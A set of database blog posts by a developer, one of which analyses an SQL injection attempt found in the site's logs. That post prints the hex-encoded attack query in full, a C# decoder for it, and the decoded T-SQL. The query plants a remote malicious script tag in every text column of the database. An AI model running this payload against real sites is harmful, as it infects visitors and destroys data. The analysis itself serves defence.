Null is foreign concept to users

Is it hard to imagine … nothing? Apparently, it is for some people.

There was this report that my users view/print. For one of the items, there wasn’t any database records for it. Correspondingly, there wasn’t anything printed for that item.

One person asked, “There’s an error. Why isn’t item X shown?” Even though the report printed out records for items Y and Z, that person didn’t figure out that there wasn’t anything to print for item X, hence blank for item X.

So the takeaway lesson? Show something, even if there’s nothing to show. For example, displaying “There are no records retrieved.” is better than a blank page. Your user might still ask stupid questions, but at least you know your application is working correctly. Sort of.

Then comes the question you should ask yourself, “Why isn’t there any records to show?”

Random Quote – Program X not social networking site

Today, my users got into a tangle. All of them got into a database deadlock.

Now my users have this habit of opening multiple windows so as to “appear busy”. Granted, my application wasn’t designed and programmed with many concurrent users in mind. Still, if more than 2 of them happen to access the same table, or heaven forbid, performing an update or delete operation on that table, the database throws up its hands in defeat and promptly denies further access. This includes other users accessing other tables.

So I did an sp_who (it’s a Sybase database) and found out the perpetrators. Then I wrote an email telling those who were doing non-critical tasks (and not still performing database transactions) to get the heck out of my database and log out of the application. And not return until half an hour later. Nicely coached in diplomatic language of course.

One of them asked if another colleague could continue, since that person was still performing a transaction. I said “Of course.” I also added something in the email that I thought was interesting (on hindsight):

Program X is not a social networking site. Log in, do your thing and log out.

Yes, I was a bit peeved and slightly mischievous at the time.

Hexed SQL – Analysis of a hack attempt

A few days ago, I was browsing through my web site logs. I was scrolling along when I saw an interesting entry (warning, long horizontal scrolling ahead. Please click through to post for easier reading):

/2008/07/15/are-you-malleable-code-editor/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S)

I thought that looked peculiar, but didn’t think much of it. It wasn’t until the next day that I felt that was a hack attempt. Yeah, my spider sense wasn’t doing very well…

So I took a closer look at it. From the keywords “DECLARE”, “CHAR(4000)”, “SET”, “CAST” and “EXEC”, I gathered this might be an SQL statement. But what’s the long string of characters doing?

Notice the “0x” in the CAST command. Hmm… hexadecimal? To prove this, I wrote a mini program:

StreamWriter sw = new StreamWriter("vince.txt");
string s = "4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72";
int i;
char c;
for (i = 0; i < s.Length; i += 2)
{
    c = Convert.ToChar(Convert.ToInt32(string.Format("0x{0}{1}", s[i], s[i + 1]), 16));
    sw.Write(c);
}
sw.WriteLine();
sw.Close();

That might not be the best way to manipulate hexadecimal, but you should definitely not follow this example.

Lo and behold, I got this (reformatted for legibility):

DECLARE @T varchar(255),@C varchar(4000)

DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C

WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://somesite.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://somesite.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor

It was a chunk of SQL statements in hexadecimal! So, let's look at it more closely. Let's start with this part:

select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

sysobjects and syscolumns are system database tables. This automatically rules out Oracle as the database, since Oracle uses all_tables and all_tab_columns. MySQL uses INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS respectively.

That leaves me with Sybase and SQL Server, the other 2 databases that I'm familiar with. Then I saw the query uses xtype. Aha! Sybase's sysobjects table doesn't have the xtype column; it only has the type column!

And so, I deduced that this was probably an attack on web sites running on SQL Servers.

Let's look at the query again. This part a.xtype='u' in the where clause searches for user tables (or tables created by the user or associated applications). This part:

b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167

needs a little more explanation. My digging into the innards of syscolumns tells me that 99, 35, 231 and 167 corresponds to ntext, text, nvarchar, varchar respectively.

Hmm... those 4 look familiar... Oh right, they're data types for storing text in databases. I have a theory as to why char and nchar are not included, but let's focus on the query first.

So in English, the query retrieves all columns of text data type of all user-created database tables. Then in the while loop, an update command in executed. Basically, it updates all the text columns in all the user-created tables to a "certain value". Let's look at this "certain value" (yes, this is THE HACK), shall we?

THE HACK starts with two single quotes, so it becomes just one single quote because of the SQL escape. Then it ends with double quotes and a greater than sign. Huh? Then there's a </title> end tag. This implies there's a starting title tag somewhere.

From this, I deduce that the hacker is assuming (or hoping) one of those text columns will be used in the title tag. This implies that the text columns are assumed to be of moderate length. char and nchar types are not usually used for these types of data, so they're left out (or the hacker didn't think they're worthy). At least that's my theory...

Moving on, we see that there's a script tag. Isn't there always? *smile* The Javascript file comes from a dubious web site from China, based on the web site address. Yes, I've anonymised it so the actual dubious site's address isn't shown (to prevent giving power to the hacker and to lower the chances of search engines banning me). You're welcome to use the C# code above to decipher the chunk of hexadecimal and find out yourself. But please, don't go to that site!

Now I don't quite understand what's with the where clause in the update statement in the exec command. Why didn't the hacker simply update all the columns instead of adding a where clause search filter? It ends up the same anyway... Perhaps it's to mix up the encoded hexadecimal so it's not similar to past attempts...

Anyway, basically THE HACK updates text columns such that if one of the text columns is used in the title tag, the web page loads the malicious Javascript and ends rendering the rest of the page. I have no idea what the Javascript file will do, and I don't intend to find out. The additional damage is the lost of data in the text columns, which is probably not as fatal as the Javascript.

And that's the end of my analysis. I hope that even if it's not relevant to you, you've learnt something from the thought processes that go into this hack investigation.

Create database user or store as table record?

Recently, someone posted a database user question on the Dream In Code forums. The gist of the question was, if you had to maintain a number of users for a web application, and each user needs an ID to log in, what’s the preferred method of doing it?

2 options were given. The first was to create an individual database ID for each user. The second was that all users use the same user ID to log in.

What I had in mind was, the database connection string. If individual database IDs were created, then when each user log in, unique connection strings are used to connect to the database. From what I know, this doesn’t scale very well, since the database throttles at a certain number of connections.

So the individual database ID case was no good. Having all users using the same ID would work. But there’s no personalisation, or you need some work to separate each user. Unless personalisation wasn’t an issue. Then there wouldn’t be any need to log in. I was a bit perplexed with the second option…

So I suggested that user IDs be stored in a database table. A database user ID is created specifically for online user log in’s. Every user has a unique ID to log in, and when logging in, the special database ID is used to form the connection string. Then the ID-password pair is used to verify against a table storing the user IDs.

Passwords would be hashed and stored in the database table. When a user logs in, the given password is hashed and compared with the one stored in the table.

This way, there’s only one unique connection string, and if I understand it correctly, it can be cached and reused, for better responsiveness.

I’ve dealt with both cases. In my work, there’s a department who handles the database. My applications are open only to internal users, and someone decided that user IDs must be controlled at the database side. And so each user has their own database ID. When logging in, the authentication process is handled by the database.

Basically I pass in a user ID and password. If a connection goes through, the user ID and password are valid.

This is sometimes infuriating, because my users are a fluid group. Some existing staff leave, or some new staff joins, and I have to ask the database department to update the list of IDs. The infuriating part is when a user asks me how to use the application and after some questioning, discover that she’s a new staff. Help desk support sometimes require me to question some of my assumptions…

The thing is, even though that department is handling the user IDs, I still have to keep a list of the IDs in a database table. The reason? User access. Certain users have rights to certain pages. The only way to control that is at the application level, not the database level.

On the other hand, I also maintain web applications where the user IDs are held in a database table. Maintaining the user list is as simple as an insert or a delete statement. There’s really only one database connection ID. This allowed me to easily scale the applications in terms of users.

I imagine the huge web sites such as the social media sites store users in a database table. I think creating thousands of database IDs is inefficient. Maybe I’m wrong. What do you think?

Quick and easy data migration check

What is the fastest and easiest way to check if 2 databases contain the same data?

Check that for every table, the number of records is the same in both databases.

Yes, it’s a superficial check. Just because the count is the same in both databases doesn’t mean they contain the same data. But it’s a quick assessment that you’ve done a data migration correctly.

Suppose we have 3 database tables FunLovingDepartments, AwesomeEmployees, and SuperbEmployeeTypes. We could do this:

select count(*) from FunLovingDepartments

and then run it against both databases. Then we do the same for the other 2 tables.

That’s just too tedious. What if we could include the table name and use a union?

select 'FunLovingDepartments', count(*) from FunLovingDepartments
union
select 'AwesomeEmployees', count(*) from AwesomeEmployees
union
select 'SuperbEmployeeTypes', count(*) from SuperbEmployeeTypes

which gives a result something like

'FunLovingDepartment'   3
'AwesomeEmployees'      17
'SuperbEmployeeTypes'   8

Much faster to analyse with everything together. What if you’ve got dozens and dozens of tables? You’re going to get carpal tunnel syndrome from typing all those select statements. Now, what if I told you how you can generate those select statements?

Notice the structure of the select statement you want.

select '{tablename}', count(*) from {tablename} union
select '{tablename}', count(*) from {tablename} union
...
select '{tablename}', count(*) from {tablename} union
select '{tablename}', count(*) from {tablename}

What you do is write the select statement that generates the select statement!

select 'select '''+name+''',count(*) from '+name+' union'
from sysobjects
where type='U'
order by name

There are 2 single quotes to produce 1 single quote because the escape character in a SQL string is the single quote.

This’ll work for SQL Server and Sybase databases. If you’re working with Oracle, no problem.

select 'select '''||TABLE_NAME||''',count(*) from '||TABLE_NAME||' union'
from ALL_TABLES
order by TABLE_NAME

Oracle SQL syntax uses 2 pipe characters for string concatenation.

The above 2 statements will generate the select-union statement that includes every table in your database. All you need is delete the trailing union from the last line. So for our fictional database, the generator SQL will produce this

select 'FunLovingDepartments', count(*) from FunLovingDepartments union
select 'AwesomeEmployees', count(*) from AwesomeEmployees union
select 'SuperbEmployeeTypes', count(*) from SuperbEmployeeTypes union

So just delete the last union keyword and you’re done.

What we have here is a classic case of code generating code. After you run the generated SQL in both databases, you’re going to get 2 sets of results. If you’ve a long list of tables, doing eyeball checks is going to speed up your myopia.

So what you do is run the generator SQL in one database to produce that big chunk of select-union statements. Then run that big chunk of select-union statements to get a set of results. Then copy those results into Excel. Do the same on the other database. What you’ll then have looks something like this in Excel.
Table count comparison in Excel

Columns A and B contain the result set from one database. Columns F and G contain the result set from the other database. Then in column D, you use an Excel formula to do string comparison between the columns. Let me give you the formula for comparing the first row.

=IF(A1=F1,0,99)+IF(B1=G1,0,9999)

What it means is if A1 (table name from database 1) equals to F1 (table name from database 2), then return value 0, otherwise 99. The other part is if B1 (number of records from database 1) equals to G1 (number of records from database 2), then return value 0, otherwise 9999. Then add the two return values. Copy that Excel cell and paste down the line. Excel will automatically make sure the cell rows are correct (A2, A3 and so on).

If the final value is 0, then for that particular table, the number of records is the same in both database. I used 99 and 9999 respectively to distinguish the two different if comparisons. But you can set them to other values, as long as it looks significantly different from 0. Remember, you’ll be scrolling up and down the Excel file (lots of tables), so you don’t want to have your eyes distinguish between for example 8 and 0.

I think the screenshot probably explained it better.

There you have it, a quick and easy data migration check method. This saved me significant amounts of time and effort before. It’s a deadly combination of a SQL statement generating a SQL statement, which in turn generated a result set, which was then copied to Excel for comparison.

Use the existing tools where possible. Not everything needs a custom written program.

P.S. Yay, it’s spring!